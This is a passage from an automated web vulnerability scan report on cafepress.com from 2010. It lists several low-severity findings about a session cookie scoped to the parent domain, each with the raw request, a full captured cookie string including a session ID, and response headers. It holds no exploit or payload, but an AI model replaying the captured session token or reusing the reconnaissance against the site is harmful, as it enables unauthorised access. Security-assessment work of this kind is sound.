Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Location: /cp/bing/errorpage.html?aspxerrorpath=/cp/moredetails.aspx
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Content-Length: 11
Date: Sun, 26 Dec 2010 13:44:56 GMT
Connection: close
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private

Bad Request

2.48. http://www.cafepress.com/cp/products/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/products/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/products/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 91664
Date: Sun, 26 Dec 2010 13:44:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 91664

<head>
<title>Products at CafePress.com</title>
</head>
<body>
<h1>Products at CafePress.com</h1>
<div> <a href="?pg=0">Product range 0</a> <a href="?pg=1">Product range 1</
...[SNIP]...

2.49. http://www.cafepress.com/cp/sitemap/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/sitemap/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/sitemap/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 147577
Date: Sun, 26 Dec 2010 13:44:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 147577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...

2.50. http://www.cafepress.com/cp/tags/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/tags/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/tags/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 204157
Date: Sun, 26 Dec 2010 13:44:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 204157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Tags at Cafepress</ti
...[SNIP]...

2.51. http://www.cafepress.com/cp/viewcart.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/viewcart.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/viewcart.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.52. http://www.cafepress.com/make/birth-announcements previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/birth-announcements

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/birth-announcements HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 54454
Date: Sun, 26 Dec 2010 13:47:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 54454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.53. http://www.cafepress.com/make/custom-baby-gear previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-baby-gear

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-baby-gear HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.54. http://www.cafepress.com/make/custom-buttons previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/custom-buttons

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/custom-buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 